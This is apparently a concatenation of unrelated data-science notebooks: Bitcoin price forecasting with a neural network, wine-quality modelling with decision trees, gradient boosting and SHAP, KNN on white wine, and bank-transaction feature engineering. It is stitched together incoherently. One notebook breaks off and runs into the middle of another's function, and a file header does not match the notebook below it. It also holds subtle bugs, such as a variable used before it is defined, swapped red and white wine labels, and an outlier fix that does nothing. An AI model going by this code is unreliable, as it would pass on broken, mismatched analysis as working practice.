btc_market_cap.columns = ['MARKET_CAP']
bch_price = pd.read_csv('../data/BCHprice.csv', index_col=['Date'])
bch_price.columns = ['BCH_PRICE']
btc_money_supply = pd.read_csv('../data/BTCmoney-supply.csv', index_col=['Date'])
btc_money_supply.columns = ['MONEY_SUPPLY']
btc_data = pd.concat([btc_price, btc_trd_vol, btc_miner_fees, btc_transaction_vol, btc_price_vol,
btc_miner_revenue, btc_difficulty, btc_transaction_per_block, btc_hash_rate,
btc_money_supply, bch_price, btc_market_cap], axis=1, sort=True)
btc_data.index= pd.to_datetime(btc_data.index, format='%Y-%m-%d')
btc_data = btc_data.loc[(btc_data.index >= '2010-01-01') & (btc_data.index <= '2019-06-30')]
# -
engineered_features = ['ma7', '14sd']
btc_data['ma7'] = btc_data['PRICE'].rolling(7).mean()
btc_data['14sd'] = btc_data['PRICE'].rolling(14).std()
base_features = list(btc_data.columns)
plot_missing_values(btc_data)
#
# 0 price does not make sense in the beginning of 2010. Its probably due to the lack of trading on exchanges at that time. It would be best to drop rows with 0 price or 0 trade volume. Since prices with 0 trading volume are also not reliable. Removing 0 price value also takes care of the missing value in the above columns.
#
btc_data = btc_data.drop(btc_data[btc_data['PRICE']==0].index)
btc_data.describe()
# ### 2)
plt.figure(figsize=(16,6))
plt.title('BTC Price Chart')
sns.lineplot(btc_data.index, btc_data['PRICE'], label='price')
plt.xlabel('date')
# ### 2 & 3)
# +
#feature engineering
# lets split our data set before we do analysis on data set to make testing phase completely independent
target = 'PRICE'
train_mask = (btc_data.index >= '2010-01-01') & (btc_data.index <= '2018-06-30')
valid_mask = (btc_data.index >= '2018-07-01') & (btc_data.index <= '2018-12-31')
test_mask = (btc_data.index >= '2019-01-01') & (btc_data.index <= '2019-06-30')
X_train_act = btc_data.loc[train_mask][base_features]
y_train_act = pd.DataFrame(btc_data.loc[train_mask][target])
X_valid_act = pd.DataFrame(btc_data.loc[valid_mask][base_features])
y_valid_act = pd.DataFrame(btc_data.loc[valid_mask][target])
X_test_act = btc_data.loc[test_mask][base_features]
y_test_act = pd.DataFrame(btc_data.loc[test_mask][target])
missing = X_train.isnull().sum()
missing = missing[missing > 0]
missing.sort_values(inplace=True)
# +
#using constant imputer for price volatility and standard scaler for normalization
constant_imputer = SimpleImputer(strategy='constant')
#normalizer
normalizer = StandardScaler()
y_normalizer = StandardScaler()
def preprocessing_pipeline(X, train=False):
ind = X.index
# Here we only scale the train dataset for fitting normalizer to prevent data leakage
if train:
X = pd.DataFrame(constant_imputer.fit_transform(X), columns=base_features)
X = pd.DataFrame(normalizer.fit_transform(X), columns=base_features)
else:
X = pd.DataFrame(constant_imputer.transform(X), columns=base_features)
X = pd.DataFrame(normalizer.transform(X), columns=base_features)
X.index = ind
return X
def y_preprocessing_pipeline(y, train=False):
ind = y.index
if train:
y = pd.DataFrame(y_normalizer.fit_transform(y), columns=[target])
else:
y = pd.DataFrame(y_normalizer.transform(y), columns=[target])
y.index = ind
return y
# +
X_train = preprocessing_pipeline(X_train_act, train=True)
X_valid = preprocessing_pipeline(X_valid_act, train=False)
X_test = preprocessing_pipeline(X_test_act, train=False)
y_train = y_preprocessing_pipeline(y_train_act, train=True)
y_valid = y_preprocessing_pipeline(y_valid_act, train=False)
y_test = y_preprocessing_pipeline(y_test_act, train=False)
# -
import scipy.stats as st
plt.figure(1); plt.title('Johnson SU')
sns.distplot(y_train, kde=False, fit=st.johnsonsu)
plt.figure(2); plt.title('Normal')
sns.distplot(y_train, kde=False, fit=st.norm)
plt.figure(3); plt.title('Log Normal')
sns.distplot(y_train, kde=False, fit=st.lognorm)
pairplot_with_target(btc_data, list(set(base_features) - set(['PRICE'])), 'PRICE')
# We can see some linear relationship of target variable with features
plot_distributions(btc_data)
# Prices, price_vol, hash_rate, TRAN_VOL appear to be following lognormal distribution. We can make log transformation to make distributions bit symmetrical
# +
#plot all columns in same chart
plt.figure(figsize=(16,6))
sns.lineplot(data=X_train, dashes=False)
# -
# ### 4)
plot_corr_heatmap(X_train)
X_train.corr()
## pair plot of all variable with each other and target
sns.pairplot(btc_data, size = 3.5)
# highly correlated
#
# 1)Money supply and transections per block
#
# 2)BCH price and transections per block
#
# 4) hashrate and difficulty are almost perfectly correlated(we should drop one of thesse)
#
# 5) miners fee and bch price
#
# 6) transections per block and bch price
#
# Negatively corr
#
# 1) Miners revenue and transections per block
#
# 2) Miners revenue and money supply(number of bitcoins)
#
#
# We should drop difficulty as it is highly correlated with hashrate and trd volume.
#
X_train = X_train.drop(['DIFFICULTY'], axis=1)
X_test = X_test.drop(['DIFFICULTY'], axis=1)
X_valid = X_valid.drop(['DIFFICULTY'], axis=1)
base_features = list(set(base_features )- set(['DIFFICULTY']))
# ### Observations
#
# 1) We have missing values for price volatility
#
# 2) Std dev of most of the columns is pretty high since 2010
#
# 3) We should reduce highly correlated features (this can be done using greedy algorithms or relying on L1 regularization of NNs)
#
# 4) Standardised features are not stationary which is evident from high shocks(non constant volatility) in the time series plot.
#
#
# ## Part 2
#
# Basic Pre processing and split done in sub parts 2,3 of Part 1.
#
# Now, lets do feature engineering to derive more predictors from past 28 days.
# First lets concat features from last 28 days and also create
#
# +
#### data processing Utils
def create_lagged_features(X,features, lag=3, dropna=False):
"""
This function creates the lagged feature dataframe specifically useful for time series modelling
"""
c_X = X
lagged_dfs = [ c_X.shift(i).add_suffix('_' + str(i)) for i in range(lag)]
lagged_dfs = pd.concat(lagged_dfs, axis=1)
if dropna:
lagged_dfs = lagged_dfs.dropna()
return lagged_dfs
def create_leading_targets(X, lead=3, dropna=False):
"""
This function creates leading targets specifically useful for predicting over multiple periods
"""
leading_df = [ X.shift(-i).add_suffix('_' + str(i)) for i in range(1, lead+1)]
leading_df =pd.concat(leading_df, axis=1)
if dropna:
leading_df = leading_df.dropna()
return leading_df
# -
lag = 28
# +
X_train_lagged = create_lagged_features(X_train, base_features,lag=lag)[lag:-7]
y_train_leading = create_leading_targets(pd.DataFrame(y_train), lead=7)[lag:-7]
X_valid_lagged = create_lagged_features(X_valid, base_features,lag=lag)[lag:-7]
y_valid_leading = create_leading_targets(pd.DataFrame(y_valid), lead=7)[lag:-7]
X_test_lagged = create_lagged_features(X_test, base_features, lag=lag)[lag:-7]
y_test_leading = create_leading_targets(pd.DataFrame(y_test), lead=7)[lag:-7]
# -
# we will start trading after 28 days and also stop trading 7 days before to avoid handling NaN cases
#
# Lets verify wheather input features are based on 28 days look back period and targets on next periods
# On 2018-06-19, we are using the prices and features from past 28 days to predict next 7 days prices. PRICE_1 is next day price and price 0 is the current day price.
# ## Part 3
# Now that our data sets are ready lets start training.
#
# But before that lets create score function
def get_model_score(model, X, y_true):
y_pred = model.predict(X)
unnormalized_pred = pd.DataFrame(y_normalizer.inverse_transform(y_pred))
unnormalized_true = pd.DataFrame(y_normalizer.inverse_transform(y_true))
return mean_absolute_error(unnormalized_pred, unnormalized_true)
# ### 1) Average and Last Value model
# +
def get_avg_model_preds(data, target):
y_preds = btc_data[target].rolling(28).mean().loc[y_valid_leading.index]
return pd.concat([y_preds]*7, axis=1)
def get_last_val_preds(data, target):
y_preds = data[target].shift(1).loc[y_valid_leading.index]
return pd.concat([y_preds]*7, axis=1)
last_val_preds = get_last_val_preds(btc_data, target)
avg_model_preds = get_avg_model_preds(btc_data, target)
unnorm_y_valid = y_normalizer.inverse_transform(y_valid_leading)
print("avg benchmark score: ", mean_absolute_error(unnorm_y_valid, avg_model_preds))
print("last val benchmark score: ", mean_absolute_error(unnorm_y_valid, last_val_preds))
plt.figure(figsize=(16,6))
plt.title('Average Model Validation Predictions(t+1)')
sns.lineplot(y_valid_leading.index, avg_model_preds.iloc[:,0], label='predicted price')
sns.lineplot(y_valid_leading.index, unnorm_y_valid[:, 0], label='actual price')
plt.xlabel('date')
# +
plt.figure(figsize=(16,6))
plt.title('Last Value Validation Predictions(T+1)')
sns.lineplot(y_valid_leading.index, last_val_preds.iloc[:,0], label='predicted price')
sns.lineplot(y_valid_leading.index, unnorm_y_valid[:, 0], label='actual price')
plt.xlabel('date')
# -
# ### 2) simple neural network
# ## Tune N (look back period)
# +
from tensorflow import set_random_seed
from keras.regularizers import l1
set_random_seed(2)
# imp_features = ['PRICE_0', 'PRICE_1', 'PRICE_2', 'PRICE_3', 'PRICE_4', 'PRICE_5', 'PRICE_6', 'PRICE_7',
# 'HASH_RATE_0','MINERS_REVENUE_0',
# 'ma7_0', '14sd_0']
# X_train_lagged_new = X_train_lagged[imp_features]
# X_valid_lagged_new = X_valid_lagged[imp_features]
scores = {'N': [],
'mae': []}
def train_simple_nn(X_train, y_train, X_valid, y_valid, lag=28, epochs=10, batch_size=50):
X_train_lagged = create_lagged_features(X_train, base_features,lag=lag)[lag:-7]
y_train_leading = create_leading_targets(pd.DataFrame(y_train), lead=7)[lag:-7]
X_valid_lagged = create_lagged_features(X_valid, base_features,lag=lag)[lag:-7]
y_valid_leading = create_leading_targets(pd.DataFrame(y_valid), lead=7)[lag:-7]
simple_nn = Sequential()
simple_nn.add(Dense(50, input_dim=X_train_lagged.shape[1], activation='relu'))
simple_nn.add(Dense(50, activation='relu'))
simple_nn.add(Dense(7))
simple_nn.compile(loss='mae', optimizer='adam', metrics=['accuracy'])
h = simple_nn.fit(X_train_lagged, y_train_leading, verbose=0,
epochs=epochs, batch_size=batch_size)
curr_score = get_model_score(simple_nn, X_valid_lagged, y_valid_leading)
return curr_score
n = range(3, 28, 3)
for i in n:
curr_score = train_simple_nn(X_train, y_train, X_valid, y_valid, lag=i, epochs=10, batch_size=50)
scores['N'].append(i)
scores['mae'].append(curr_score)
# -
pd.DataFrame(scores)
# ## Tuning epoch and batch size
epochs = range(10, 100, 20)
batch = range(20, 200, 30)
scores = {'epoch': [],
'batch': [],
'mae': []}
for e in epochs:
for b in batch:
print(e, b)
curr_score = train_simple_nn(X_train, y_train, X_valid, y_valid, lag=6, epochs=e, batch_size=b)
scores['epoch'].append(e)
scores['batch'].append(b)
scores['mae'].append(curr_score)
pd.DataFrame(scores)
# ### Final tuned model
# N = 6
#
# e = 50
#
# batch_size = 20
# +
lag=6
X_train_lagged = create_lagged_features(X_train, base_features,lag=lag)[lag:-7]
y_train_leading = create_leading_targets(pd.DataFrame(y_train), lead=7)[lag:-7]
X_valid_lagged = create_lagged_features(X_valid, base_features,lag=lag)[lag:-7]
y_valid_leading = create_leading_targets(pd.DataFrame(y_valid), lead=7)[lag:-7]
# -
X_test_lagged = create_lagged_features(X_test, base_features, lag=lag)[lag:-7]
y_test_leading = create_leading_targets(pd.DataFrame(y_test), lead=7)[lag:-7]
simple_nn = Sequential()
simple_nn.add(Dense(50, input_dim=X_train_lagged.shape[1], activation='relu'))
simple_nn.add(Dense(50, activation='relu'))
simple_nn.add(Dense(7))
simple_nn.compile(loss='mae', optimizer='adam', metrics=['accuracy'])
h = simple_nn.fit(X_train_lagged, y_train_leading, epochs=50, batch_size=20,
validation_data=(X_valid_lagged, y_valid_leading), shuffle=False)
y_valid_pred = simple_nn.predict(X_valid_lagged)
print("simple nn un-normalized validation mae score: ",
get_model_score(simple_nn, X_valid_lagged, y_valid_leading))
plt.plot(h.history['loss'], label='SimpleNN train', color='brown')
plt.plot(h.history['val_loss'], label='SimpleNN valid', color='blue')
plt.legend()
plt.show()
# +
# plot actual and predicted value for N+1 period
# -
unnormalised_y_valid_pred = y_normalizer.inverse_transform(y_valid_pred)
unnorm_y_valid = y_normalizer.inverse_transform(y_valid_leading)
plt.figure(figsize=(16,6))
plt.title('Simple NN Model Validation Predictions(t+1)')
sns.lineplot(y_valid_leading.index, unnormalised_y_valid_pred[:,0], label='predicted price t+1')
sns.lineplot(y_valid_leading.index, unnorm_y_valid[:, 0], label='actual price')
plt.xlabel('date')
# score on validation set
scores = simple_nn.evaluate(X_valid_lagged, y_valid_leading, verbose=0)
print("Accuracy: " + str(scores))
# saving normalizer
from sklearn.externals import joblib
joblib.dump(y_normalizer, 'price_normalizer.pkl')
# +
#saving deep learning model
# -
joblib.dump(simple_nn, 'simple_nn.pkl')
# +
X_train_lagged.to_csv('X_train_lagged.csv')
y_train_leading.to_csv('y_train_leading.csv')
X_valid_lagged.to_csv('X_valid_lagged.csv')
y_valid_leading.to_csv('y_valid_leading.csv')
X_test_lagged.to_csv('X_test_lagged.csv')
y_test_leading.to_csv('y_test_leading.csv')
# -
| 17,938 |
/Modeling_and_Validation/notebooks/ROC.v1.ipynb
|
90f368e17fefe005568293cf5059f2f1cc8cdd7b
|
[] |
no_license
|
jplineb/Watson-Precision-Agriculture
|
https://github.com/jplineb/Watson-Precision-Agriculture
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 2,527 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Abrindo a caixa preta dos algoritmos de ML
#
#
# ### Motivação
#
# Vimos que existem algoritmos de alta interpretabilidade como regressões lineares e arvores de decisão simples. Mas nem sempre (quase nunca) esses algoritmos simples são os que retornam os melhores resultados preditivos (os menores valores na nossa curva de custo). E ficamos nesse impasse, usar algoritmos simples para conseguir explicar como ele chegou nos resultados (e ter mais confiança da área não técnica) ou usar algoritmos super poderosos que não temos a minima ideia de como ele chegou em um resultado qualquer?
#
#
# Uma saída para isso é usar as duas abordagens. Usa-se um algoritmo simples para sabermos o que está acontecendo e um mais poderoso que é uma caixa-preta para fazer previsões.
#
#
# Outra saída é tentarmos abrir a caixa preta e entender o que se passa lá.
#
# Vamos usar um dataset com caracteristicas de vinhos para treinarmos esses conceitos.
#
#
# #### O problema
# O presente problema se refere aos dados de vinhos portugueses "Vinho Verde", que possuem
# variantes de vinho branco e tinto. Devido a questões de privacidade, apenas variáveis
# físico-químicas (input) e sensoriais (output) estão disponíveis (por exemplo, não há dados
# sobre tipo de uva, marca do vinho, preço de venda, etc).
#
# #### Objetivo
# Criar um modelo para estimar a qualidade do vinho.
# Informação sobre os atributos
# Variáveis input (baseado em testes físico-químicos):
# 1. Tipo
# 2. Acidez fixa
# 3. Volatilidade da acidez
# 4. Ácido cítrico
# 5. Açúcar residual
# 6. Cloretos
# 7. Dióxido de enxofre livre
# 8. Dióxido de enxofre total
# 9. Densidade
# 10. pH
# 11. Sulfatos
# 12. Álcool
#
# #### Variável output/target (baseado em dado sensorial):
# Qualidade (score entre 0 and 10)
# +
# %matplotlib inline
import math
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import statsmodels.api as sm
import statsmodels.formula.api as smf
from io import StringIO
wine=pd.read_csv("winequality.csv",sep=';')
wine.head()
# -
wine.describe()
wine[wine.alcohol==97.333000]['alcohol']=9.7333000
wine['type'].value_counts()
wine.shape
wine.drop_duplicates().shape
wine.isnull().sum()
red_counts=wine.groupby('quality').size()
plt.xlabel("Qualidade")
plt.ylabel("Quantidade")
plt.title('Histograma Distribuição das notas')
red_counts.plot(kind='bar', color='b')
plt.show()
print("white mean = ", wine[wine['type']=='Red']["quality"].mean())
print("red mean =", wine[wine['type']=='White']["quality"].mean())
sns.pairplot(wine.drop_duplicates(), hue='type')
plt.subplots(figsize=(20,15))
ax = plt.axes()
ax.set_title("Wine Characteristic Correlation Heatmap (Reds)")
corr = wine.corr()
sns.heatmap(corr,
xticklabels=corr.columns.values,
yticklabels=corr.columns.values,
annot=True)
plt.show()
wine.rename(columns={'fixed acidity': 'fixed_acidity','citric acid':'citric_acid','volatile acidity':'volatile_acidity','residual sugar':'residual_sugar','free sulfur dioxide':'free_sulfur_dioxide','total sulfur dioxide':'total_sulfur_dioxide'}, inplace=True)
wine.dtypes
# +
function1 = '''
quality ~ total_sulfur_dioxide
+ free_sulfur_dioxide
+ residual_sugar
+ fixed_acidity
+ volatile_acidity
+ alcohol
+ citric_acid
+ sulphates
+ chlorides
+ pH
+ density
+ C(type)
'''
results1 = smf.ols(function1, data=wine).fit()
print(results1.summary())
# +
from sklearn.model_selection import train_test_split
wine_w_dummies = pd.get_dummies(wine)
X = wine_w_dummies.drop('quality', axis=1)
y = wine_w_dummies['quality']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)
# +
from sklearn.tree import DecisionTreeRegressor
from sklearn import metrics
dtr = DecisionTreeRegressor(max_depth=4)
dtr.fit(X_train,y_train)
yhat = dtr.predict(X_test)
r2 = metrics.r2_score(y_test,yhat)
mse = metrics.mean_squared_error(y_test,yhat)
print(f'r2: {round(r2,4)}, mse:{round(mse,4)}')
# +
from sklearn.tree import export_graphviz
import pydotplus
from IPython.display import Image
dot_data = StringIO()
export_graphviz(dtr,
out_file=dot_data,
filled=True,
rounded=True,
special_characters=True,
feature_names=list(X))
graph = pydotplus.graph_from_dot_data(dot_data.getvalue())
Image(graph.create_png())
# +
from sklearn.ensemble import GradientBoostingRegressor
gbr = GradientBoostingRegressor(max_depth=4, n_estimators=1000)
gbr.fit(X_train,y_train)
yhat = gbr.predict(X_test)
r2 = metrics.r2_score(y_test,yhat)
mse = metrics.mean_squared_error(y_test, yhat)
print(f'r2: {round(r2,4)}, mse:{round(mse,4)}')
# +
test_score = np.zeros((1000,), dtype=np.float64)
for i, y_pred in enumerate(gbr.staged_predict(X_test)):
test_score[i] = gbr.loss_(y_test, y_pred)
plt.figure(figsize=(12, 6))
plt.subplot(1, 2, 1)
plt.title('Custo Treino x Teste')
plt.plot(np.arange(1000) + 1, gbr.train_score_, 'b-',
label='Training Set Deviance')
plt.plot(np.arange(1000) + 1, test_score, 'r-',
label='Test Set Deviance')
plt.legend(loc='upper right')
plt.xlabel('Boosting Iterations')
plt.ylabel('Custo')
# -
feature_importance = gbr.feature_importances_
feature_importance = 100.0 * (feature_importance / feature_importance.max())
sorted_idx = np.argsort(feature_importance)
pos = np.arange(sorted_idx.shape[0]) + .5
plt.subplot(1, 2, 2)
plt.barh(pos, feature_importance[sorted_idx], align='center')
plt.yticks(pos, X.columns[sorted_idx])
plt.xlabel('Relative Importance')
plt.title('Variable Importance')
plt.show()
# # Bonus - Usando Teoria dos Jogos
#
#
# ## SHAP Values
#
# https://github.com/slundberg/shap
#
# Você viu (e usou) técnicas para extrair insights gerais de um modelo de aprendizado de máquina. Mas e se você quiser detalhar como o modelo funciona para uma previsão individual?
#
# Os valores SHAP (um acrônimo da SHApley Additive exPlanations) dividem uma previsão para mostrar o impacto de cada recurso. Onde você poderia usar isso?
#
#
# - Um modelo diz que um banco não deve emprestar dinheiro a alguém, e o banco é legalmente obrigado a explicar a base para cada rejeição de empréstimo.
#
# - Um profissional de saúde deseja identificar quais fatores estão direcionando o risco de alguma doença de cada paciente, para que possam abordar diretamente esses fatores de risco com intervenções de saúde direcionadas.
import shap
shap_values = shap.TreeExplainer(gbr).shap_values(X_test)
# ### Plot importance com shap values
# +
global_shap_vals = np.abs(shap_values).mean(0)[:-1]
variables_values = pd.DataFrame(list(zip(X_test.columns,global_shap_vals)))
variables_values.rename(columns={0:'variable',1:'shap_value'},inplace=True)
variables_values.sort_values(by=['shap_value'],ascending=False,inplace=True)
top_n = variables_values.head(25)
pos=range(0,-top_n.shape[0],-1)
plt.barh(pos, top_n['shap_value'], color="#1E88E5")
plt.yticks(pos, top_n['variable'])
plt.xlabel("mean SHAP value magnitude (change in log odds)")
plt.gcf().set_size_inches(8, 5.5)
plt.gca()
plt.show()
# -
# ### Resumo dos impactos das variáveis no modelo
# +
# , plot_type="layered_violin", color='coolwarm'
# -
shap.summary_plot(shap_values, X_test)
# ### Vamos entender agora como o Modelo afeta uma única predição
# +
row_to_show = 5
data_for_prediction = X_test.iloc[row_to_show] # use 1 row of data here. Could use multiple rows if desired
data_for_prediction_array = data_for_prediction.values.reshape(1, -1)
# Create object that can calculate shap values
explainer = shap.TreeExplainer(gbr)
# Calculate Shap values
shap_values = explainer.shap_values(data_for_prediction)
# -
# O objeto shap_values acima é uma lista com duas matrizes. A primeira matriz na lista é os valores de SHAP para um resultado negativo (não ganhe o prêmio). A segunda matriz é a lista de valores SHAP para o resultado positivo, que é como normalmente pensamos em previsões. É complicado revisar uma matriz bruta, mas o pacote shap tem uma boa maneira de visualizar os resultados.
# Interpretação: Valores em vermelho aumentam o rating médio e os valores azuis diminuem.
shap.initjs()
shap.force_plot(explainer.expected_value, shap_values, data_for_prediction)
# E se fizessemos o grafico acima para diversas observações? poderiamos entender por exemplo como o impacto das variáveis "evolui"?
#
# No grafico abaixo fizemos 100 graficos semelhantes ao de cima e viramos 90 graus
# visualize the training set predictions
shap_values = shap.TreeExplainer(gbr).shap_values(X_test.head(100))
shap.force_plot(explainer.expected_value, shap_values, X_test.head(100))
shap_values = shap.TreeExplainer(gbr).shap_values(X_test)
shap.dependence_plot("sulphates", shap_values, X_test)
shap_values = shap.TreeExplainer(gbr).shap_values(X_test)
shap.dependence_plot("volatile_acidity", shap_values, X_test)
# ### Para aprender como funciona por dentro utilize o paper original: https://arxiv.org/abs/1705.07874
#
#
# ### Para ter uma interpretação mais intuitiva, há diversos textos pela internet, como esse: https://medium.com/@gabrieltseng/interpreting-complex-models-with-shap-values-1c187db6ec83
#
#
| 9,464 |
/FE/hw1/hw_data_processing.ipynb
|
0c13c707bb348c59fa0bd0084153da7a033fc407
|
[] |
no_license
|
alexpon92/ntlg_test
|
https://github.com/alexpon92/ntlg_test
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 997,437 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 导入相应的包
import pandas as pd
#皮尔逊相关系数
from scipy.stats import pearsonr
#标准化
from sklearn.preprocessing import StandardScaler
#数据划分
from sklearn.model_selection import train_test_split
#KNN
from sklearn.neighbors import KNeighborsClassifier
#交叉检验
from sklearn.model_selection import cross_val_score
# # 获取数据集
data=pd.read_csv("./winequality-white.csv",sep=";")
# # 特征处理
# ## 比较各特征间的皮尔逊相关系数
data_title = data.columns.values.tolist()
for i in range(len(data_title)):
for j in range(i+1,len(data_title)):
print('%s和%s之间的皮尔逊相关系数为%f'%(data_title[i],data_title[j],pearsonr(data[data_title[i]],data[data_title[j]])[0]))
# ## 给白酒质量分类
def Quality(e):
if e>0 and e<=4:
return 'bad'
elif e>4 and e<=7:
return 'ordinary'
else:
return 'good'
data['Quality'] = data['quality'].map(Quality)
data.drop(['quality'],axis=1,inplace=True)
# ## 去掉皮尔逊相关系数高的特征
# 去掉“free sulfur dioxide”、“density”,“pH”
data2=data[["fixed acidity","volatile acidity","citric acid","residual sugar","chlorides","free sulfur dioxide","sulphates","alcohol"]]
data3=data.Quality
# # 机器学习
# ## 划分数据集
x_train,x_test,y_train,y_test = train_test_split(data2,data3,test_size =0.2,random_state = 6)
# ## 五折交叉验证
# +
#使用KNN算法模型
model = KNeighborsClassifier()
score=cross_val_score(model,data2,data3,cv=5,scoring='accuracy')
print ('平均准确率',score.mean())
print ('每则准确率',score)
# -
return 'night_0_6'
def group_by_hour(df):
tr_day_time = df.copy(deep=True)
tr_day_time['day_time'] = tr_day_time['TRDATETIME']\
.apply(lambda x: process_hour((datetime.datetime.strptime(x, '%d%b%y:%H:%M:%S')).strftime('%H')))
return tr_day_time.groupby(['cl_id', 'day_time'])['cl_id'].size().unstack().fillna(0).reset_index()
# -
grouped_by_hour = group_by_hour(transactions_train)
grouped_by_hour.head(10)
grouped_by_hour[['afternoon_12_18', 'evening_18_0', 'morning_6_12', 'night_0_6']].describe()
grouped_by_hour[['afternoon_12_18', 'evening_18_0', 'morning_6_12', 'night_0_6']].sum()
_ = scatter_matrix(
grouped_by_hour[['cl_id', 'afternoon_12_18', 'evening_18_0', 'morning_6_12', 'night_0_6']], figsize=(15, 10)
)
# Как мы можем наблюдать, основное кол-во транзакций приходится на ночное время, однако по данному сету не ясно, в какой временной зоне находятся наши пользователи.
# *Далее, разделим время выполнение транзакции по дням недели*
def group_by_day(df):
tr_day_time = df.copy(deep=True)
tr_day_time['day_time'] = tr_day_time['TRDATETIME']\
.apply(lambda x: (datetime.datetime.strptime(x, '%d%b%y:%H:%M:%S')).strftime('%A'))
return tr_day_time.groupby(['cl_id', 'day_time'])['cl_id'].size().unstack().fillna(0).reset_index()
grouped_by_day = group_by_day(transactions_train)
grouped_by_day.head(10)
grouped_by_day[['Friday', 'Monday', 'Saturday', 'Sunday', 'Thursday', 'Tuesday', 'Wednesday']].sum()
_ = scatter_matrix(
grouped_by_day[['cl_id', 'Friday', 'Monday', 'Saturday', 'Sunday', 'Thursday', 'Tuesday', 'Wednesday']], figsize=(15, 10)
)
# Как мы видим, по дням транщакции распределены довольно равномерно.
# ##### Далее рассмотрим параметр currency
transactions_train['currency'].value_counts(normalize=True)[:10]
# $\approx 97%$ - проходят по одной валюте, код 810. Для дальнейшего анализа можно пойти на упрощение и рассматривать операции только в двух типах:
# 1. main_type
# 2. other_types
# Тогда произведем кодирование и построим датасет с новыми значениями валют
def prepare_currency(df):
currency_df = df.copy(deep=True)
currency_df['currrency_enc'] = currency_df['currency'].apply(
lambda x: 'main_type' if x == 810 else 'other_types'
)
return currency_df.groupby(['cl_id', 'currrency_enc'])['cl_id'].size().unstack().fillna(0).reset_index()
currency_df = prepare_currency(transactions_train)
currency_df[['main_type', 'other_types']].describe()
_ = scatter_matrix(
currency_df[['cl_id', 'main_type', 'other_types']], figsize=(15, 10)
)
# Ничего конкретного по распределению сказать нельзя, можно лишь сказать, что, в основном, кол-во транзакций пользователей в отрезке [0, 200] операций
# ##### Далее рассмотрим параметр channel_type
transactions_train['channel_type'].value_counts(dropna=False, normalize=True)
# В нашей выборке превалируют два типа - type1, type2. Остальные типы, включая неизвестный, составляют $\approx 3%$. Исходя из этого, объединим все типы, кроме первого и второго в typeOther и посмотрим на распределение
# +
def group_by_channel_types(df):
channel_type_gr = df.copy()
channel_type_gr['channel_type'] = channel_type_gr['channel_type'].fillna('typeOther')
channel_type_gr['channel_type']\
.where(channel_type_gr['channel_type'].isin(['type1', 'type2']), 'typeOther', inplace=True)
return channel_type_gr[['cl_id', 'channel_type']]\
.groupby(['cl_id', 'channel_type']).size().unstack().fillna(0).reset_index()
channel_type_gr = group_by_channel_types(transactions_train)
channel_type_gr[['type1', 'type2', 'typeOther']].describe()
# -
# ##### Далее рассмотрим параметр MCC
# Для начала проанализируем, в какой пропорции представлен каждый MCC
# +
border_val = 0.004 # border percent, from which we are not considering mcc
mcc_values = raw_df['MCC'].value_counts(normalize=True).to_dict()
total_outsiders = []
popular_mcc = []
[total_outsiders.append(val) if val < border_val else popular_mcc.append(key) for key, val in mcc_values.items()]
print(f'Общий процент непопулярных MCC {round(sum(total_outsiders) * 100, 3)}% при пороговом значении доли MCC {border_val * 100}%')
print(f'Кол-во популярных MCC {len(popular_mcc)}')
# -
# Выделим популярные MCC, а остальные объединим в одну категорию
# +
def group_and_encode_by_mcc(df, popular_mcc_codes):
mcc_trs = df.copy()
mcc_trs['mcc_enc'] = mcc_trs['MCC'].apply(
lambda x: 'MCC_{}'.format(x) if x in popular_mcc_codes else 'MCC_other'
)
columns_to_create = set(map(lambda x: 'MCC_{}'.format(x), popular_mcc))
columns_to_create.add('MCC_other')
mcc_trs = mcc_trs[['cl_id', 'mcc_enc']]\
.groupby(['cl_id', 'mcc_enc']).size().unstack().fillna(0).reset_index()
created_columns = set()
[created_columns.add(column) for column in mcc_trs.columns.values if column.find('MCC_') != -1]
not_created_columns = list(columns_to_create - created_columns)
for column in not_created_columns:
mcc_trs[column] = 0
return mcc_trs
grouped_by_mcc = group_and_encode_by_mcc(transactions_train, popular_mcc)
grouped_by_mcc.describe()
# -
# ##### Далее рассмотрим параметр trx_category
transactions_train['trx_category'].value_counts(normalize=True)
# +
def group_by_trx_cat(df):
return df[['cl_id', 'trx_category']]\
.groupby(['cl_id', 'trx_category']).size().unstack().fillna(0).reset_index()
grouped_by_trx_cat = group_by_trx_cat(transactions_train)
grouped_by_trx_cat.describe()
# -
# #### Формирование итогового сета
# +
def group_and_aggregate_data(df, popular_mcc):
by_hour = group_by_hour(df).set_index('cl_id')
by_day = group_by_day(df).set_index('cl_id')
by_currency = prepare_currency(df).set_index('cl_id')
by_channel_type = group_by_channel_types(df).set_index('cl_id')
by_mcc = group_and_encode_by_mcc(df, popular_mcc).set_index('cl_id')
by_trx = group_by_trx_cat(df).set_index('cl_id')
res_set = by_hour.join(by_day).join(by_currency)\
.join(by_channel_type).join(by_mcc).join(by_trx)
return res_set
train_result_set = group_and_aggregate_data(transactions_train, popular_mcc)
train_result_set.head(10)
# -
def get_target_flag(df):
tf = df[['cl_id', 'target_flag']].groupby(['cl_id', 'target_flag']).sum().reset_index()
return tf['target_flag'].copy()
# #### Обучим нашу модель
# +
from sklearn.linear_model import LinearRegression
import sklearn.metrics as sk_metrics
train_target_flag_vals = get_target_flag(transactions_train)
lin_reg = LinearRegression()
lin_reg.fit(train_result_set, train_target_flag_vals)
# -
# on train sample
predictions_for_train = lin_reg.predict(train_result_set)
# on test sample
test_set = group_and_aggregate_data(transactions_test, popular_mcc)
test_target_flag_vals = get_target_flag(transactions_test)
predictions_for_test = lin_reg.predict(test_set)
# +
roc_auc_train = np.round(sk_metrics.roc_auc_score(train_target_flag_vals, predictions_for_train), 2)
roc_auc_test = np.round(sk_metrics.roc_auc_score(test_target_flag_vals, predictions_for_test), 2)
print(f'AUC for train {roc_auc_train}')
print(f'AUC for test {roc_auc_test}')
# +
fpr_train, tpr_train, thresholds_train = sk_metrics.roc_curve(train_target_flag_vals, predictions_for_train)
fpr_test, tpr_test, thresholds_test = sk_metrics.roc_curve(test_target_flag_vals, predictions_for_test)
